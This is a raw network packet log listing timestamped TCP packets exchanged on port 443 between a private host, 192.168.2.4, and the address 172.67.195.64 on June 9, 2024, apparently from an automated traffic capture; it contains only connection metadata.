Jun 9, 2024 01:26:08.183434010 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183476925 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.183507919 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.183645964 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183686018 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183721066 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.183732033 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183760881 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.183782101 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.184045076 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.184083939 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.184129000 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.184200048 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.184238911 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.184262037 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.184314013 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.184355974 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.184416056 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.184432030 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.184459925 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.185383081 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.189613104 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.189626932 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.189724922 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.189743996 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.189764023 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.189810991 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.189857006 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.190172911 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.190185070 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.190280914 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.190330029 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.190354109 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.190371037 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.190438032 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.190454960 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.219799042 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.219841957 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.219907999 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.219935894 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.219959021 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.219961882 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.220010042 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.220037937 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.220052004 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.220082998 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.262586117 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.293626070 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.293689966 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.293741941 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.293766022 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.293838978 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.293881893 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.293934107 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.293963909 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.293977976 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.294008017 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.294029951 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.294219971 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.294306040 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.294312000 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.294336081 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.294385910 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.294405937 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.294521093 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.294562101 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.294605017 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.294617891 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.294651031 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.294684887 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.295027018 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.295074940 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.295118093 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.295131922 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.295212984 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.295212984 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.295576096 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.295624018 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.295703888 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.295717955 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.295799971 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.296117067 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.296144009 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.296190023 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.296205044 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.296230078 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.296269894 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.296719074 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.296739101 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.296793938 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.296808004 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.296833992 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.297241926 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.297266960 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.297318935 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.297333002 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.297358990 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.297401905 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.297661066 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.297790051 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.297813892 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.297875881 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.297890902 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.297950983 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.298347950 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.298367023 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.298439980 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.298455000 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.298528910 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.298763990 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.298825979 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.298846960 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.298911095 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.298926115 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.298995018 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.299400091 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.299420118 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.299478054 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.299490929 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.299521923 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.299549103 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.299987078 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.300007105 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.300084114 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.300097942 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.300152063 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.300653934 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.300684929 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.300748110 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.300762892 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.300793886 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.300812960 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.301197052 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.301220894 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.301270962 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.301290989 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.301320076 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.301347971 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.301678896 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.301700115 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.301750898 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.301763058 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.301810026 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.301831007 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.302063942 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.302086115 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.302129030 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.302141905 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.302170992 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.302196026 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.302465916 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.302485943 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.302525997 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.302537918 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.302568913 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.302597046 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.302897930 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.302917957 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.303003073 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.303021908 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.303049088 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.303105116 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.303311110 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.303333998 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.303379059 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.303391933 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.303420067 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.303452969 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.303742886 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.303764105 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.303828001 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.303842068 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.303896904 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.304205894 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.304229021 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.304271936 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.304286003 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.304316044 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.304343939 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.304635048 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.304655075 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.304703951 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.304717064 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.304749012 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.304776907 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305056095 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305078030 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305126905 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305140972 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305171967 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305192947 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305502892 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305526972 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305588961 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305602074 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305633068 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305665970 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305814981 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305836916 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305883884 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305896997 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305927038 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305933952 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305952072 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.305957079 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.305969000 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306001902 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306067944 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306093931 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306114912 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306164026 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306179047 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306202888 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306232929 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306241989 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306257010 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306283951 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306325912 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306340933 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306355000 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306372881 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306401968 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306447029 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306639910 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306660891 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306739092 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306752920 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306773901 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306797981 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306845903 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306859016 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306890011 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306904078 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306921959 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.306969881 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.306984901 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307012081 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.307030916 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307055950 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307095051 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.307110071 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307138920 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.307156086 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307177067 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307214022 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.307229996 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307251930 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307255030 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.307287931 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307327032 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.307341099 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.307368040 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.311707973 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.312506914 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.312526941 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.312611103 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.312627077 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.312686920 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.313159943 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.313184977 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.313231945 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.313245058 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.313271999 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.313280106 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.313299894 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.313343048 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.313355923 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.313396931 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.313397884 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.313421011 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.313460112 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.313474894 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.313500881 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314023018 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314047098 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314086914 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314100981 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314143896 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314152002 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314172983 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314215899 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314230919 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314253092 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314266920 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314279079 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314342022 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314361095 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314382076 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314384937 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314405918 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314455986 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314476967 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314501047 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314800024 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314826965 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314867020 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314879894 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314904928 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.314943075 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.314960957 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.315004110 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.315017939 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.315042973 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.315092087 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.315115929 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.315150023 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.315164089 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.315190077 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.317446947 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.335788012 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.335833073 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.335877895 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.335896969 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.335956097 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.336435080 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.336477995 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.336510897 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.336522102 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.336571932 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.336941004 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.336982012 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.337008953 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.337040901 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.337048054 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.337372065 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.337419987 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.337747097 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.337789059 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.337789059 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.337816954 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.337831974 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.337866068 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.338361025 CEST	49733	443	192.168.2.4	172.67.195.64
